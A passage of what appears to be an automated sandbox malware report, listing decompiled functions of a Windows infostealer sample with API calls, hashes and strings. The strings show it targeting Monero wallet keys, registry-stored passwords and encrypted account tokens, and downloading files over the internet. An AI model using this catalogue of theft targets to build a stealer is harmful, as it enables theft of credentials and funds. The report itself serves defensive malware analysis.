                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: dff07c43d0a9199533bbd33bf3ca6fd447a65818853d016e179da6eb3d850f88
                                    • Instruction ID: ec940aafa2380dbb075e26a64829559206e9a62889cdf7a3f3dd5ade721b2200
                                    • Opcode Fuzzy Hash: dff07c43d0a9199533bbd33bf3ca6fd447a65818853d016e179da6eb3d850f88
                                    • Instruction Fuzzy Hash: 305159B1D501196BCB25FB61DD92FED737CAF54300F4041A8B60A66081EF346B85DFA6
                                    Function 00FA75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FA72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FA733A
                                      • Part of subcall function 00FA72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FA73B1
                                      • Part of subcall function 00FA72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FA740D
                                      • Part of subcall function 00FA72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00FA7452
                                      • Part of subcall function 00FA72D0: HeapFree.KERNEL32(00000000), ref: 00FA7459
                                    • lstrcat.KERNEL32(00000000,00FC17FC), ref: 00FA7606
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FA7648
                                    • lstrcat.KERNEL32(00000000, : ), ref: 00FA765A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FA768F
                                    • lstrcat.KERNEL32(00000000,00FC1804), ref: 00FA76A0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FA76D3
                                    • lstrcat.KERNEL32(00000000,00FC1808), ref: 00FA76ED
                                    • task.LIBCPMTD ref: 00FA76FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID: :
                                    • API String ID: 2677904052-3653984579
                                    • Opcode ID: d8708abdc929181640fbaf89b815155196b6b3cf1ce91ee046587def5be736a7
                                    • Instruction ID: aa7e4d66d1ec7c7c491ba3aea1e7caed9e92f48bf6f6c53c221ce0816ef972d9
                                    • Opcode Fuzzy Hash: d8708abdc929181640fbaf89b815155196b6b3cf1ce91ee046587def5be736a7
                                    • Instruction Fuzzy Hash: BE3154B1D00109DFCB18EBE4EC55EFE77B4BF8A301B104128F112AB285DA34A946DF51
                                    Function 00FA60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FA4839
                                      • Part of subcall function 00FA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FA4849
                                    • InternetOpenA.WININET(00FC0DF7,00000001,00000000,00000000,00000000), ref: 00FA610F
                                    • StrCmpCA.SHLWAPI(?,008CEB98), ref: 00FA6147
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00FA618F
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00FA61B3
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00FA61DC
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FA620A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00FA6249
                                    • InternetCloseHandle.WININET(?), ref: 00FA6253
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA6260
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: d043eab4113ed4fee0829bb5906bb5fa25861525cdc6e35e6dba1b884e29914b
                                    • Instruction ID: 9fa7b17633c8bf25ee0428ebf351e341ec483ed8cd5fb8ecdf1707afac25dc13
                                    • Opcode Fuzzy Hash: d043eab4113ed4fee0829bb5906bb5fa25861525cdc6e35e6dba1b884e29914b
                                    • Instruction Fuzzy Hash: 8D5182B1D40218ABDF24DFA0DC45BEE77B8EF44705F1080A8B606AB1C0DB75AA85DF95
                                    Function 00FA72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FA733A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FA73B1
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FA740D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00FA7452
                                    • HeapFree.KERNEL32(00000000), ref: 00FA7459
                                    • task.LIBCPMTD ref: 00FA7555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetask
                                    • String ID: Password
                                    • API String ID: 775622407-3434357891
                                    • Opcode ID: 4d483e3003159c04bf88ca4d88148908000e301501b1eb10203799bba265aac6
                                    • Instruction ID: e4889a0260dd15061b672959afa51bfd9d2c4d4c8b8f8e71bfa7962e4e397909
                                    • Opcode Fuzzy Hash: 4d483e3003159c04bf88ca4d88148908000e301501b1eb10203799bba265aac6
                                    • Instruction Fuzzy Hash: 73613AB5D042689BDB24DB50DC41FDAB7B8BF49300F0081E9E649A6141EFB46BC9DFA1
                                    Function 00FABA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                    • lstrlen.KERNEL32(00000000), ref: 00FABC9F
                                      • Part of subcall function 00FB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FB8E52
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00FABCCD
                                    • lstrlen.KERNEL32(00000000), ref: 00FABDA5
                                    • lstrlen.KERNEL32(00000000), ref: 00FABDB9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: 707655eb57741f3b6d987948c87dcaa363a07ae95d14a93506033c2fe48e6bdd
                                    • Instruction ID: b7a2437d8fa88470df366539a7d670794e37ac401093f58f4228dadfc5d9d7b4
                                    • Opcode Fuzzy Hash: 707655eb57741f3b6d987948c87dcaa363a07ae95d14a93506033c2fe48e6bdd
                                    • Instruction Fuzzy Hash: 3AB14071910108ABDB14FBE1DD96EEE737CAF54300F404168F506A7492EF38AA59EF62
                                    Function 00FB6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: f61cc94c0e2ef63638a52eb0b284986b3fe801101218adb32a42f64cdffa048c
                                    • Instruction ID: 75236872ca2ac127accd5167d71d1d24c423704d6e990a9f06318609d59db5b4
                                    • Opcode Fuzzy Hash: f61cc94c0e2ef63638a52eb0b284986b3fe801101218adb32a42f64cdffa048c
                                    • Instruction Fuzzy Hash: 5FF03A34D84209EFD358DFE0B509B6C7BB4FF04703F1402A8E61A8B284DA754AC19B95
                                    Function 00FA4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FA4FCA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FA4FD1
                                    • InternetOpenA.WININET(00FC0DDF,00000000,00000000,00000000,00000000), ref: 00FA4FEA
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00FA5011
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00FA5041
                                    • InternetCloseHandle.WININET(?), ref: 00FA50B9
                                    • InternetCloseHandle.WININET(?), ref: 00FA50C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: 9c2a4da06800980166f3e46ea85776f42a2374e9f51e9a8e8e10ef21d8e84de7
                                    • Instruction ID: 43d0fda1064666207b0e696c624fb3d764ffba9e576fa062103a9d725c87ddba
                                    • Opcode Fuzzy Hash: 9c2a4da06800980166f3e46ea85776f42a2374e9f51e9a8e8e10ef21d8e84de7
                                    • Instruction Fuzzy Hash: F23108F5A40218ABDB24CF94DC85BDCB7B4EB48704F1081E8F709A7284C7746AC59F99
                                    Function 00FB8100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008CDE48,00000000,?,00FC0E2C,00000000,?,00000000), ref: 00FB8130
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB8137
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00FB8158
                                    • wsprintfA.USER32 ref: 00FB81AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2922868504-3474575989
                                    • Opcode ID: 02482d7aad38b8ccd39baf90604e3698117bc2807419daf191ea370eb28f2def
                                    • Instruction ID: 550abe241d239d863cfb77b55e62cf1b5a60d1b5580e83aafdde2eca7c61ea98
                                    • Opcode Fuzzy Hash: 02482d7aad38b8ccd39baf90604e3698117bc2807419daf191ea370eb28f2def
                                    • Instruction Fuzzy Hash: 2A2129B1E44208ABDB14DFD5DC49FAEBBB8EB44B50F104119F615BB280D77859018BA5
                                    Function 00FB83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00FB8426
                                    • wsprintfA.USER32 ref: 00FB8459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00FB847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FB848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FB8499
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                    • RegQueryValueExA.ADVAPI32(00000000,008CDE90,00000000,000F003F,?,00000400), ref: 00FB84EC
                                    • lstrlen.KERNEL32(?), ref: 00FB8501
                                    • RegQueryValueExA.ADVAPI32(00000000,008CE0A0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00FC0B34), ref: 00FB8599
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FB8608
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FB861A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: ebea88796d50408731898c90e232dd26fd6f621d7acc76daa0e8b8b588d1693a
                                    • Instruction ID: f219e54a6b0b00e434d20bfbab8e79bb6f5dc55681b9881659ae2995d623402a
                                    • Opcode Fuzzy Hash: ebea88796d50408731898c90e232dd26fd6f621d7acc76daa0e8b8b588d1693a
                                    • Instruction Fuzzy Hash: AA210A71900218ABDB24DB94DC85FE9B7B9FF48700F00C1A8A60997140DF71AAC6CFE4
                                    Function 00FB7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB76A4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB76AB
                                    • RegOpenKeyExA.ADVAPI32(80000002,008BC3F0,00000000,00020119,00000000), ref: 00FB76DD
                                    • RegQueryValueExA.ADVAPI32(00000000,008CDFB0,00000000,00000000,?,000000FF), ref: 00FB76FE
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FB7708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
